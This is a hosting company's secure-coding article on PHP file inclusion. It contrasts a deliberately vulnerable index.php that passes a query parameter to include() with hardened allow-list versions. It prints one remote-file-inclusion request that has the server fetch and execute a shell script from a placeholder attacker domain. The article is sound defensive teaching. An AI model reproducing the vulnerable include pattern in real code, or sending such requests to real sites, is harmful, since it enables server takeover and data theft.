PHP Security and YOU - Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis, so HostNexus wants to encourage clients to use file inclusion in PHP in a more security-conscious and safer manner.

Including files with PHP is common practice, and most usage comes in two forms: including internal files from your own domain, and including files from remote (external) sources. This looks something like:


Internal:

<?php
include("http://www.myowndomain.com/something.txt");
?>

External:

<?php include("http://www.externaldomain.com/something.txt"); ?>

Both are valid syntax in the PHP world (URL includes only work when the allow_url_include setting is enabled), but there are two main problems we see on the servers. The first is that when you include a file using the URL of your own domain, your server opens an HTTP request to itself and ties up a second web server process while the first one waits for the answer; if the fetched file in turn includes by URL, the requests chain into an endless loop that drives up server load and can crash the server. If you want to include files from your own domain, use the server path instead:

<?php
include('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

<?php
include("http://www.externaldomain.com/something.txt");
?>

The main problem with include() is that it runs whatever it fetches through the PHP parser and executes any code it finds. The danger becomes acute when the file name is taken from a variable the visitor controls, which is easily exploited. Here is an example index.php, written in the old register_globals style where a query-string parameter silently becomes the variable $go:

<?php
$go = $_GET['go']; // what register_globals did implicitly: ?go=... becomes $go
echo "<html>\n";
echo " <body>\n";
include("$go");    // visitor-controlled path handed straight to include()
echo " </body>\n";
echo "</html>\n";
?>

The $go variable above is exploited with a request like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

shell.txt is fetched from the attacker's server and executed as PHP with the permissions of your web account. The hacker can now run commands, modify your files, install phishing sites, send spam and steal data.
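The fix for both problems above (URL includes of your own files, and a visitor-controlled include path) is the same: never let request data reach include() as a path, and include local files by server path only. Below is an added example, not code from the original article, of a hardened index.php that replaces include("$go") with an allow-list lookup. The page names, the pages/ directory and the files in it are assumptions for illustration; it assumes PHP 7.1 or later.

```php
<?php
// Added example (not from the original article): hardened replacement for
// include("$go"). Page names and file paths are illustrative assumptions.

declare(strict_types=1);

// Fixed map: allowed value of ?go= => file on disk, relative to this script.
// Only these keys can ever be included; nothing from the request is used as
// a path, so neither http://hackerdomain/shell.txt nor ../../config.php can
// reach include().
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Resolve the requested page name to an absolute local path, or null if the
 * request is not on the allow-list. The request value is used only as a
 * dictionary key, never concatenated into a file name.
 */
function resolvePage(?string $requested): ?string
{
    $key = $requested ?? 'home';
    if (!array_key_exists($key, PAGES)) {
        return null;                         // unknown page: refuse, don't guess
    }
    $path = realpath(__DIR__ . '/' . PAGES[$key]);
    // realpath() returns false for a missing file. Also confirm the resolved
    // file still lives under the application directory, which guards against
    // a mistaken entry in PAGES pointing outside the web root.
    if ($path === false || strpos($path, __DIR__ . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = resolvePage($_GET['go'] ?? null);

echo "<html>\n";
echo " <body>\n";
if ($page === null) {
    http_response_code(404);
    echo "  <p>Unknown page.</p>\n";
} else {
    include $page;                           // local server path, never a URL
}
echo " </body>\n";
echo "</html>\n";
```

With this in place, ?go=http://www.hackerdomain.com/shell.txt simply gets a 404, because the value is not a key in PAGES. As a second line of defence on the server, allow_url_include (Off by default since PHP 5.2) should stay off, so include() refuses URLs entirely even if such code slips through.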

If you want to display files from remote domains, use PHP's readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure, this is a large improvement: readfile() simply copies the data to the browser rather than executing it as PHP. Two caveats remain. readfile() must never be given a visitor-controlled path either, since it would then read and display any file your account can see, including configuration files holding database passwords. And whatever it prints is untrusted content from another server, so it lands in your page unescaped.
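Below is an added example, not code from the original article, of pulling remote text into a page as data rather than code. The feed URLs and the ?feed= parameter are assumptions for illustration. It deliberately uses file_get_contents() instead of readfile(): readfile() writes straight to the output, which leaves no chance to escape the content before it reaches the visitor's browser. It assumes allow_url_fopen is On (PHP's default) and does not need allow_url_include, because nothing fetched is ever executed.

```php
<?php
// Added example (not from the original article): fetching remote text as
// data, with a fixed list of sources and HTML escaping on output.
// Feed names and URLs are illustrative assumptions.

declare(strict_types=1);

// Fixed set of remote sources. The request only selects a key; the URL
// itself never comes from the request, so this cannot be pointed at
// /etc/passwd, config.php or an attacker's server.
const FEEDS = [
    'news'    => 'http://www.externaldomain.com/news.txt',
    'notices' => 'http://www.externaldomain.com/notices.txt',
];

/**
 * Fetch the selected feed as plain text. Returns null for unknown keys or
 * network failures. Uses allow_url_fopen (data), not allow_url_include (code).
 */
function fetchFeed(string $key): ?string
{
    if (!array_key_exists($key, FEEDS)) {
        return null;
    }
    // Bound the wait so a slow remote host cannot tie up this web process.
    $ctx  = stream_context_create(['http' => ['timeout' => 5]]);
    $body = @file_get_contents(FEEDS[$key], false, $ctx);
    return $body === false ? null : $body;
}

$body = fetchFeed($_GET['feed'] ?? 'news');

echo "<html>\n <body>\n";
if ($body === null) {
    echo "  <p>Feed unavailable.</p>\n";
} else {
    // The remote text is untrusted: escape it so a compromised or malicious
    // feed cannot inject markup or script into your visitors' browsers.
    // (readfile() would print it raw, which is the "not 100% secure" part.)
    echo '  <pre>' . htmlspecialchars($body, ENT_QUOTES, 'UTF-8') . "</pre>\n";
}
echo " </body>\n</html>\n";
```

If the remote file is meant to be rendered as HTML rather than shown as text, escaping is not an option and the content must come from a source you control and trust completely; a plain readfile() of a fixed URL is then acceptable, but the URL still must not be built from request data.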

That's All Folks!


See you all next time.
